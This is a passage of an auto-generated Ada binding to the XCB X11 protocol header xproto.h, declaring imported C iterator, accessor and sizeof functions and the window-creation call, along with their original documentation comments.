xcb_cursor_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_cursor_t) -- procedure xcb_cursor_next (i : access xcb_cursor_iterator_t) -- /usr/include/xcb/xproto.h:4970 with Import => True, Convention => C, External_Name => "xcb_cursor_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_cursor_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_cursor_end (i : xcb_cursor_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:4982 with Import => True, Convention => C, External_Name => "xcb_cursor_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_font_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_font_t) -- procedure xcb_font_next (i : access xcb_font_iterator_t) -- /usr/include/xcb/xproto.h:4993 with Import => True, Convention => C, External_Name => "xcb_font_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_font_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_font_end (i : xcb_font_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5005 with Import => True, Convention => C, External_Name => "xcb_font_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_gcontext_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_gcontext_t) -- procedure xcb_gcontext_next (i : access xcb_gcontext_iterator_t) -- /usr/include/xcb/xproto.h:5016 with Import => True, Convention => C, External_Name => "xcb_gcontext_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_gcontext_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_gcontext_end (i : xcb_gcontext_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5028 with Import => True, Convention => C, External_Name => "xcb_gcontext_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_colormap_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_colormap_t) -- procedure xcb_colormap_next (i : access xcb_colormap_iterator_t) -- /usr/include/xcb/xproto.h:5039 with Import => True, Convention => C, External_Name => "xcb_colormap_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_colormap_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_colormap_end (i : xcb_colormap_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5051 with Import => True, Convention => C, External_Name => "xcb_colormap_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_atom_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_atom_t) -- procedure xcb_atom_next (i : access xcb_atom_iterator_t) -- /usr/include/xcb/xproto.h:5062 with Import => True, Convention => C, External_Name => "xcb_atom_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_atom_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_atom_end (i : xcb_atom_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5074 with Import => True, Convention => C, External_Name => "xcb_atom_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_drawable_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_drawable_t) -- procedure xcb_drawable_next (i : access xcb_drawable_iterator_t) -- /usr/include/xcb/xproto.h:5085 with Import => True, Convention => C, External_Name => "xcb_drawable_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_drawable_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_drawable_end (i : xcb_drawable_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5097 with Import => True, Convention => C, External_Name => "xcb_drawable_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_fontable_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_fontable_t) -- procedure xcb_fontable_next (i : access xcb_fontable_iterator_t) -- /usr/include/xcb/xproto.h:5108 with Import => True, Convention => C, External_Name => "xcb_fontable_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_fontable_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_fontable_end (i : xcb_fontable_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5120 with Import => True, Convention => C, External_Name => "xcb_fontable_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_bool32_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_bool32_t) -- procedure xcb_bool32_next (i : access xcb_bool32_iterator_t) -- /usr/include/xcb/xproto.h:5131 with Import => True, Convention => C, External_Name => "xcb_bool32_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_bool32_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_bool32_end (i : xcb_bool32_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5143 with Import => True, Convention => C, External_Name => "xcb_bool32_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_visualid_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_visualid_t) -- procedure xcb_visualid_next (i : access xcb_visualid_iterator_t) -- /usr/include/xcb/xproto.h:5154 with Import => True, Convention => C, External_Name => "xcb_visualid_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_visualid_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_visualid_end (i : xcb_visualid_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5166 with Import => True, Convention => C, External_Name => "xcb_visualid_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_timestamp_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_timestamp_t) -- procedure xcb_timestamp_next (i : access xcb_timestamp_iterator_t) -- /usr/include/xcb/xproto.h:5177 with Import => True, Convention => C, External_Name => "xcb_timestamp_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_timestamp_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_timestamp_end (i : xcb_timestamp_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5189 with Import => True, Convention => C, External_Name => "xcb_timestamp_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_keysym_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_keysym_t) -- procedure xcb_keysym_next (i : access xcb_keysym_iterator_t) -- /usr/include/xcb/xproto.h:5200 with Import => True, Convention => C, External_Name => "xcb_keysym_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_keysym_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_keysym_end (i : xcb_keysym_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5212 with Import => True, Convention => C, External_Name => "xcb_keysym_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_keycode_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_keycode_t) -- procedure xcb_keycode_next (i : access xcb_keycode_iterator_t) -- /usr/include/xcb/xproto.h:5223 with Import => True, Convention => C, External_Name => "xcb_keycode_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_keycode_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_keycode_end (i : xcb_keycode_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5235 with Import => True, Convention => C, External_Name => "xcb_keycode_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_keycode32_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_keycode32_t) -- procedure xcb_keycode32_next (i : access xcb_keycode32_iterator_t) -- /usr/include/xcb/xproto.h:5246 with Import => True, Convention => C, External_Name => "xcb_keycode32_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_keycode32_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_keycode32_end (i : xcb_keycode32_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5258 with Import => True, Convention => C, External_Name => "xcb_keycode32_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_button_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_button_t) -- procedure xcb_button_next (i : access xcb_button_iterator_t) -- /usr/include/xcb/xproto.h:5269 with Import => True, Convention => C, External_Name => "xcb_button_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_button_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_button_end (i : xcb_button_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5281 with Import => True, Convention => C, External_Name => "xcb_button_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_point_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_point_t) -- procedure xcb_point_next (i : access xcb_point_iterator_t) -- /usr/include/xcb/xproto.h:5292 with Import => True, Convention => C, External_Name => "xcb_point_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_point_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_point_end (i : xcb_point_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5304 with Import => True, Convention => C, External_Name => "xcb_point_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_rectangle_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_rectangle_t) -- procedure xcb_rectangle_next (i : access xcb_rectangle_iterator_t) -- /usr/include/xcb/xproto.h:5315 with Import => True, Convention => C, External_Name => "xcb_rectangle_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_rectangle_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_rectangle_end (i : xcb_rectangle_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5327 with Import => True, Convention => C, External_Name => "xcb_rectangle_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_arc_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_arc_t) -- procedure xcb_arc_next (i : access xcb_arc_iterator_t) -- /usr/include/xcb/xproto.h:5338 with Import => True, Convention => C, External_Name => "xcb_arc_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_arc_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_arc_end (i : xcb_arc_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5350 with Import => True, Convention => C, External_Name => "xcb_arc_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_format_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_format_t) -- procedure xcb_format_next (i : access xcb_format_iterator_t) -- /usr/include/xcb/xproto.h:5361 with Import => True, Convention => C, External_Name => "xcb_format_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_format_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_format_end (i : xcb_format_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5373 with Import => True, Convention => C, External_Name => "xcb_format_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_visualtype_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_visualtype_t) -- procedure xcb_visualtype_next (i : access xcb_visualtype_iterator_t) -- /usr/include/xcb/xproto.h:5384 with Import => True, Convention => C, External_Name => "xcb_visualtype_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_visualtype_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_visualtype_end (i : xcb_visualtype_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5396 with Import => True, Convention => C, External_Name => "xcb_visualtype_end"; function xcb_depth_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5399 with Import => True, Convention => C, External_Name => "xcb_depth_sizeof"; function xcb_depth_visuals (R : access constant xcb_depth_t) return access xcb_visualtype_t -- /usr/include/xcb/xproto.h:5402 with Import => True, Convention => C, External_Name => "xcb_depth_visuals"; function xcb_depth_visuals_length (R : access constant xcb_depth_t) return int -- /usr/include/xcb/xproto.h:5405 with Import => True, Convention => C, External_Name => "xcb_depth_visuals_length"; function xcb_depth_visuals_iterator (R : access constant xcb_depth_t) return xcb_visualtype_iterator_t -- /usr/include/xcb/xproto.h:5408 with Import => True, Convention => C, External_Name => "xcb_depth_visuals_iterator"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_depth_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_depth_t) -- procedure xcb_depth_next (i : access xcb_depth_iterator_t) -- /usr/include/xcb/xproto.h:5419 with Import => True, Convention => C, External_Name => "xcb_depth_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_depth_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_depth_end (i : xcb_depth_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5431 with Import => True, Convention => C, External_Name => "xcb_depth_end"; function xcb_screen_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5434 with Import => True, Convention => C, External_Name => "xcb_screen_sizeof"; function xcb_screen_allowed_depths_length (R : access constant xcb_screen_t) return int -- /usr/include/xcb/xproto.h:5437 with Import => True, Convention => C, External_Name => "xcb_screen_allowed_depths_length"; function xcb_screen_allowed_depths_iterator (R : access constant xcb_screen_t) return xcb_depth_iterator_t -- /usr/include/xcb/xproto.h:5440 with Import => True, Convention => C, External_Name => "xcb_screen_allowed_depths_iterator"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_screen_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_screen_t) -- procedure xcb_screen_next (i : access xcb_screen_iterator_t) -- /usr/include/xcb/xproto.h:5451 with Import => True, Convention => C, External_Name => "xcb_screen_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_screen_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_screen_end (i : xcb_screen_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5463 with Import => True, Convention => C, External_Name => "xcb_screen_end"; function xcb_setup_request_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5466 with Import => True, Convention => C, External_Name => "xcb_setup_request_sizeof"; function xcb_setup_request_authorization_protocol_name (R : access constant xcb_setup_request_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:5469 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_name"; function xcb_setup_request_authorization_protocol_name_length (R : access constant xcb_setup_request_t) return int -- /usr/include/xcb/xproto.h:5472 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_name_length"; function xcb_setup_request_authorization_protocol_name_end (R : access constant xcb_setup_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5475 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_name_end"; function xcb_setup_request_authorization_protocol_data (R : access constant xcb_setup_request_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:5478 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_data"; function xcb_setup_request_authorization_protocol_data_length (R : access constant xcb_setup_request_t) return int -- /usr/include/xcb/xproto.h:5481 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_data_length"; function xcb_setup_request_authorization_protocol_data_end (R : access constant xcb_setup_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5484 with Import => True, Convention => C, External_Name => "xcb_setup_request_authorization_protocol_data_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_setup_request_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_setup_request_t) -- procedure xcb_setup_request_next (i : access xcb_setup_request_iterator_t) -- /usr/include/xcb/xproto.h:5495 with Import => True, Convention => C, External_Name => "xcb_setup_request_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_setup_request_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_setup_request_end (i : xcb_setup_request_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5507 with Import => True, Convention => C, External_Name => "xcb_setup_request_end"; function xcb_setup_failed_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5510 with Import => True, Convention => C, External_Name => "xcb_setup_failed_sizeof"; function xcb_setup_failed_reason (R : access constant xcb_setup_failed_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:5513 with Import => True, Convention => C, External_Name => "xcb_setup_failed_reason"; function xcb_setup_failed_reason_length (R : access constant xcb_setup_failed_t) return int -- /usr/include/xcb/xproto.h:5516 with Import => True, Convention => C, External_Name => "xcb_setup_failed_reason_length"; function xcb_setup_failed_reason_end (R : access constant xcb_setup_failed_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5519 with Import => True, Convention => C, External_Name => "xcb_setup_failed_reason_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_setup_failed_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_setup_failed_t) -- procedure xcb_setup_failed_next (i : access xcb_setup_failed_iterator_t) -- /usr/include/xcb/xproto.h:5530 with Import => True, Convention => C, External_Name => "xcb_setup_failed_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_setup_failed_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_setup_failed_end (i : xcb_setup_failed_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5542 with Import => True, Convention => C, External_Name => "xcb_setup_failed_end"; function xcb_setup_authenticate_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5545 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_sizeof"; function xcb_setup_authenticate_reason (R : access constant xcb_setup_authenticate_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:5548 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_reason"; function xcb_setup_authenticate_reason_length (R : access constant xcb_setup_authenticate_t) return int -- /usr/include/xcb/xproto.h:5551 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_reason_length"; function xcb_setup_authenticate_reason_end (R : access constant xcb_setup_authenticate_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5554 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_reason_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_setup_authenticate_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_setup_authenticate_t) -- procedure xcb_setup_authenticate_next (i : access xcb_setup_authenticate_iterator_t) -- /usr/include/xcb/xproto.h:5565 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_setup_authenticate_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_setup_authenticate_end (i : xcb_setup_authenticate_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5577 with Import => True, Convention => C, External_Name => "xcb_setup_authenticate_end"; function xcb_setup_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5580 with Import => True, Convention => C, External_Name => "xcb_setup_sizeof"; function xcb_setup_vendor (R : access constant xcb_setup_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:5583 with Import => True, Convention => C, External_Name => "xcb_setup_vendor"; function xcb_setup_vendor_length (R : access constant xcb_setup_t) return int -- /usr/include/xcb/xproto.h:5586 with Import => True, Convention => C, External_Name => "xcb_setup_vendor_length"; function xcb_setup_vendor_end (R : access constant xcb_setup_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5589 with Import => True, Convention => C, External_Name => "xcb_setup_vendor_end"; function xcb_setup_pixmap_formats (R : access constant xcb_setup_t) return access xcb_format_t -- /usr/include/xcb/xproto.h:5592 with Import => True, Convention => C, External_Name => "xcb_setup_pixmap_formats"; function xcb_setup_pixmap_formats_length (R : access constant xcb_setup_t) return int -- /usr/include/xcb/xproto.h:5595 with Import => True, Convention => C, External_Name => "xcb_setup_pixmap_formats_length"; function xcb_setup_pixmap_formats_iterator (R : access constant xcb_setup_t) return xcb_format_iterator_t -- /usr/include/xcb/xproto.h:5598 with Import => True, Convention => C, External_Name => "xcb_setup_pixmap_formats_iterator"; function xcb_setup_roots_length (R : access constant xcb_setup_t) return int -- /usr/include/xcb/xproto.h:5601 with Import => True, Convention => C, External_Name => "xcb_setup_roots_length"; function xcb_setup_roots_iterator (R : access constant xcb_setup_t) return xcb_screen_iterator_t -- /usr/include/xcb/xproto.h:5604 with Import => True, Convention => C, External_Name => "xcb_setup_roots_iterator"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_setup_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_setup_t) -- procedure xcb_setup_next (i : access xcb_setup_iterator_t) -- /usr/include/xcb/xproto.h:5615 with Import => True, Convention => C, External_Name => "xcb_setup_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_setup_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_setup_end (i : xcb_setup_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5627 with Import => True, Convention => C, External_Name => "xcb_setup_end"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_client_message_data_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_client_message_data_t) -- procedure xcb_client_message_data_next (i : access xcb_client_message_data_iterator_t) -- /usr/include/xcb/xproto.h:5638 with Import => True, Convention => C, External_Name => "xcb_client_message_data_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_client_message_data_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_client_message_data_end (i : xcb_client_message_data_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:5650 with Import => True, Convention => C, External_Name => "xcb_client_message_data_end"; function xcb_create_window_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access constant xcb_create_window_value_list_t) return int -- /usr/include/xcb/xproto.h:5653 with Import => True, Convention => C, External_Name => "xcb_create_window_value_list_serialize"; function xcb_create_window_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access xcb_create_window_value_list_t) return int -- /usr/include/xcb/xproto.h:5658 with Import => True, Convention => C, External_Name => "xcb_create_window_value_list_unpack"; function xcb_create_window_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:5663 with Import => True, Convention => C, External_Name => "xcb_create_window_value_list_sizeof"; function xcb_create_window_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:5667 with Import => True, Convention => C, External_Name => "xcb_create_window_sizeof"; --* -- * @brief Creates a window -- * -- * @param c The connection -- * @param depth Specifies the new window's depth (TODO: what unit?). -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the depth is taken from the -- * \a parent window. -- * @param wid The ID with which you will refer to the new window, created by -- * `xcb_generate_id`. -- * @param parent The parent window of the new window. -- * @param x The X coordinate of the new window. -- * @param y The Y coordinate of the new window. -- * @param width The width of the new window. -- * @param height The height of the new window. -- * @param border_width TODO: -- * \n -- * Must be zero if the `class` is `InputOnly` or a `xcb_match_error_t` occurs. -- * @param _class A bitmask of #xcb_window_class_t values. -- * @param _class \n -- * @param visual Specifies the id for the new window's visual. -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the visual is taken from the -- * \a parent window. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @return A cookie -- * -- * Creates an unmapped window as child of the specified \a parent window. A -- * CreateNotify event will be generated. The new window is placed on top in the -- * stacking order with respect to siblings. -- * -- * The coordinate system has the X axis horizontal and the Y axis vertical with -- * the origin [0, 0] at the upper-left corner. Coordinates are integral, in terms -- * of pixels, and coincide with pixel centers. Each window and pixmap has its own -- * coordinate system. For a window, the origin is inside the border at the inside, -- * upper-left corner. -- * -- * The created window is not yet displayed (mapped), call `xcb_map_window` to -- * display it. -- * -- * The created window will initially use the same cursor as its parent. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_window_checked (c : access xcb.xcb_connection_t; depth : bits_stdint_uintn_h.uint8_t; wid : xcb_window_t; parent : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; border_width : bits_stdint_uintn_h.uint16_t; u_class : bits_stdint_uintn_h.uint16_t; visual : xcb_visualid_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:5716 with Import => True, Convention => C, External_Name => "xcb_create_window_checked"; --* -- * @brief Creates a window -- * -- * @param c The connection -- * @param depth Specifies the new window's depth (TODO: what unit?). -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the depth is taken from the -- * \a parent window. -- * @param wid The ID with which you will refer to the new window, created by -- * `xcb_generate_id`. -- * @param parent The parent window of the new window. -- * @param x The X coordinate of the new window. -- * @param y The Y coordinate of the new window. -- * @param width The width of the new window. -- * @param height The height of the new window. -- * @param border_width TODO: -- * \n -- * Must be zero if the `class` is `InputOnly` or a `xcb_match_error_t` occurs. -- * @param _class A bitmask of #xcb_window_class_t values. -- * @param _class \n -- * @param visual Specifies the id for the new window's visual. -- * \n -- * The special value `XCB_COPY_FROM_PARENT` means the visual is taken from the -- * \a parent window. -- * @param value_mask A bitmask of #xcb_cw_t values. -- * @return A cookie -- * -- * Creates an unmapped window as child of the specified \a parent window. A -- * CreateNotify event will be generated. The new window is placed on top in the -- * stacking order with respect to siblings. -- * -- * The coordinate system has the X axis horizontal and the Y axis vertical with -- * the origin [0, 0] at the upper-left corner. Coordinates are integral, in terms -- * of pixels, and coincide with pixel centers. Each window and pixmap has its own -- * coordinate system. For a window, the origin is inside the border at the inside, -- * 